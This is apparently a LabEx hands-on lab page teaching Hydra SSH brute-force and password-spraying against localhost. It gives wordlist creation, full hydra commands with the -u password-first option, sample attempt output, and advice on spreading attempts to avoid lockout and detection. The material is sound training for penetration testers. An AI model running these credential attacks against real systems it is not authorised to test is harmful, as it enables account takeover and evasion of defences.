LabEx
Log InJoin Free

Loop Passwords in Hydra Attacks

HydraBeginner
Practice Now

Introduction

In this lab, you will learn how Hydra iterates through usernames and passwords during an SSH attack. You will create username and password lists, then run a default SSH attack to observe Hydra's default behavior.

First, you will prepare usernames.txt and passwords.txt files containing lists of usernames and passwords, respectively. Then, you will execute a basic Hydra SSH attack using these lists to demonstrate how Hydra attempts different combinations. Finally, you will explore the impact of the -u option on the order in which Hydra attempts username and password combinations.

Prepare Username and Password Lists

In this step, you will create two essential files: a username list and a password list. These lists will be used by Hydra to attempt SSH logins. Creating these lists allows you to systematically test various username and password combinations against your target.

First, open your terminal. You are currently in the /home/labex/project directory (also accessible as ~/project). You will create the files in this directory.

Use the nano text editor to create a file named usernames.txt:

nano ~/project/usernames.txt

Now, add the following usernames to the file. These are examples; you can customize them as needed.

root
admin
test
user
ubuntu

After adding the content, save the file by pressing Ctrl + O, then press Enter to confirm the filename, and finally press Ctrl + X to exit nano.

Next, you will create the password list. Again, use nano to create a file named passwords.txt:

nano ~/project/passwords.txt

Add the following passwords to the file. Remember, these are just examples.

password
123456
qwerty
secret
ubuntu

Save the file by pressing Ctrl + O, then press Enter to confirm the filename, and finally press Ctrl + X to exit nano.

To verify that the files have been created correctly, you can use the cat command to display their contents.

Display the content of usernames.txt:

cat ~/project/usernames.txt

You should see output similar to this:

root
admin
test
user
ubuntu

Similarly, display the content of passwords.txt:

cat ~/project/passwords.txt

You should see output similar to this:

password
123456
qwerty
secret
ubuntu

These files, usernames.txt and passwords.txt, are now ready to be used with Hydra in the subsequent steps.

Run Default SSH Attack

In this step, you will execute a basic SSH attack using Hydra with the username and password lists you created in the previous step. This will demonstrate Hydra's default behavior of iterating through usernames and passwords.

The basic syntax of the Hydra command is:

hydra [options] <target> <service> [additional options]
  • hydra: The command to invoke the Hydra tool.
  • [options]: Various options to customize the attack, such as specifying username and password lists.
  • <target>: The IP address or hostname of the target SSH server. For this lab, you will use 127.0.0.1 (localhost) as the target.
  • <service>: The service to attack (e.g., ssh, ftp, http). In this case, it's ssh.
  • [additional options]: Service-specific options.

Now, run the default SSH attack. You will use the -L option to specify the username list, the -P option to specify the password list, and the -V option to see verbose output showing each attempt.

hydra -V -L ~/project/usernames.txt -P ~/project/passwords.txt 127.0.0.1 ssh

This command instructs Hydra to:

  • -V: Enable verbose mode to show each login attempt.
  • -L ~/project/usernames.txt: Use the usernames.txt file in the ~/project directory as the list of usernames.
  • -P ~/project/passwords.txt: Use the passwords.txt file in the ~/project directory as the list of passwords.
  • 127.0.0.1: Target the SSH service running on localhost.
  • ssh: Specify that you are attacking the SSH service.

Execute the command in your terminal. Hydra will now attempt to log in to the SSH service on 127.0.0.1 using each username in usernames.txt and each password in passwords.txt. By default, Hydra iterates through the usernames first, trying each password for a single username before moving to the next username.

The output will show the attempts being made. You will see detailed information about each login attempt. Since you are using weak passwords and targeting localhost, it is possible a login will succeed, but most attempts will fail.

The output will be similar to this (the exact output may vary):

Hydra vX.X (c) XXXX by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at YYYY-MM-DD HH:MM:SS
[DATA] max X tasks per X server, overall X tasks, X login tries (l:X/p:X), ~X try per task
[DATA] attacking ssh://127.0.0.1:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "root" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "root" - pass "123456" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "root" - pass "qwerty" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "root" - pass "secret" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "root" - pass "ubuntu" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - X of X [child X] (X/X)
...

Notice how Hydra tries all passwords for the "root" user first, then moves to "admin", and so on. This is the default behavior.

Run with -u to Loop Passwords First

In this step, you will use the -u option with Hydra to change the order in which it attempts logins. By default, Hydra iterates through usernames first, trying all passwords for each username before moving on. The -u option reverses this behavior, causing Hydra to iterate through passwords first, trying each password for all usernames before moving on to the next password.

This can be useful in situations where you suspect that a common password is being used across multiple accounts.

To use the -u option, you simply add it to your previous Hydra command. You'll also use the -V option again to see the detailed attempts.

hydra -u -V -L ~/project/usernames.txt -P ~/project/passwords.txt 127.0.0.1 ssh

This command instructs Hydra to:

  • -u: Loop passwords first.
  • -V: Enable verbose mode to show each login attempt.
  • -L ~/project/usernames.txt: Use the usernames.txt file in the ~/project directory as the list of usernames.
  • -P ~/project/passwords.txt: Use the passwords.txt file in the ~/project directory as the list of passwords.
  • 127.0.0.1: Target the SSH service running on localhost.
  • ssh: Specify that you are attacking the SSH service.

Execute the command in your terminal. Hydra will now attempt to log in to the SSH service on 127.0.0.1. This time, it will try the first password in passwords.txt against every username in usernames.txt before moving on to the next password.

Observe the output. You should notice that the order of attempts is different from the previous step. Hydra will now be trying the same password against multiple usernames in sequence.

The output will be similar to this (the exact output may vary):

Hydra vX.X (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at YYYY-MM-DD HH:MM:SS
[DATA] max X tasks per X server, overall X tasks, X login tries (l:X/p:X), ~X try per task
[DATA] attacking ssh://127.0.0.1:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "root" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "test" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "ubuntu" - pass "password" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "root" - pass "123456" - X of X [child X] (X/X)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "123456" - X of X [child X] (X/X)
...

Notice how Hydra now tries the "password" against all usernames first, then moves to "123456" for all usernames, and so on. This is the behavior when using the -u option.

By comparing the output of this command with the output of the command in the previous step, you can clearly see the difference in the order of login attempts. This can be helpful in understanding how Hydra works and in choosing the most effective attack strategy for a given situation.

Analyze Attack Patterns and Performance

In this step, you will analyze the practical differences between the two attack methods and understand when each approach might be more effective. You'll also explore how to optimize Hydra attacks based on different scenarios.

Understanding the Strategic Difference

The choice between default mode and -u mode can significantly impact attack efficiency:

  • Default mode (username-first): Better when you suspect specific users might have weak passwords
  • Password-first mode (-u): Better when you suspect common passwords are used across multiple accounts

Let's demonstrate this with a more targeted approach. First, create a smaller, more focused test to clearly see the difference:

echo -e "admin\ntest" > ~/project/small_users.txt
echo -e "password\n123456" > ~/project/small_passwords.txt

Now run both attacks with limited output to see the pattern clearly:

Default attack (username-first):

hydra -V -t 1 -L ~/project/small_users.txt -P ~/project/small_passwords.txt 127.0.0.1 ssh

The -t 1 option limits Hydra to use only 1 task at a time, making the sequence easier to follow.

Password-first attack:

hydra -u -V -t 1 -L ~/project/small_users.txt -P ~/project/small_passwords.txt 127.0.0.1 ssh

Performance Analysis

Now let's analyze the timing and efficiency. Create a simple timing test:

echo "Testing default mode timing..."
time hydra -L ~/project/usernames.txt -P ~/project/passwords.txt 127.0.0.1 ssh > /dev/null 2>&1
echo "Testing -u mode timing..."
time hydra -u -L ~/project/usernames.txt -P ~/project/passwords.txt 127.0.0.1 ssh > /dev/null 2>&1

Real-world Application Scenarios

Understanding when to use each mode:

  1. Use default mode when:

    • You have intelligence about specific high-value accounts
    • You want to quickly test if admin accounts have weak passwords
    • You're targeting a small number of privileged users

  2. Use -u mode when:

    • You suspect password reuse across multiple accounts
    • You have a list of common passwords from previous breaches
    • You want to find any account with a common weak password

Verify Attack Patterns

To clearly see the difference in attack patterns, let's create a simple demonstration:

echo "=== Default Mode Pattern ==="
hydra -V -t 1 -L ~/project/small_users.txt -P ~/project/small_passwords.txt 127.0.0.1 ssh 2>&1 | grep "ATTEMPT" | head -4
echo "=== Password-First Mode Pattern ==="
hydra -u -V -t 1 -L ~/project/small_users.txt -P ~/project/small_passwords.txt 127.0.0.1 ssh 2>&1 | grep "ATTEMPT" | head -4

This will clearly show you:

  • Default mode: admin/password, admin/123456, test/password, test/123456
  • Password-first mode: admin/password, test/password, admin/123456, test/123456

The difference becomes crucial when dealing with account lockout policies or when trying to avoid detection by spreading attempts across multiple accounts.

Summary

In this lab, you have learned how to prepare the necessary files for a Hydra SSH attack by creating username and password lists in the ~/project directory. You executed SSH attacks using Hydra with verbose output to observe the detailed attack attempts and understand Hydra's iteration behavior.

You explored the critical difference between Hydra's default mode (username-first iteration) and the -u option (password-first iteration). Through hands-on practice, you discovered:

  • Default mode: Tries all passwords for each username before moving to the next username - ideal for targeting specific high-value accounts
  • Password-first mode (-u): Tries each password against all usernames before moving to the next password - better for finding accounts with common weak passwords

You also learned practical considerations for choosing between these modes, including performance implications and real-world scenarios where each approach is most effective. This understanding allows you to optimize your penetration testing strategies based on the specific target environment and objectives.

The lab demonstrated how different attack patterns can be crucial when dealing with account lockout policies or when trying to avoid detection by distributing login attempts across multiple accounts.

Related Hydra Courses
Hydra for Beginners

Hydra for Beginners

cybersecurityhydrakali
Hydra Cybersecurity Attack Labs

Hydra Cybersecurity Attack Labs

cybersecurityhydrakali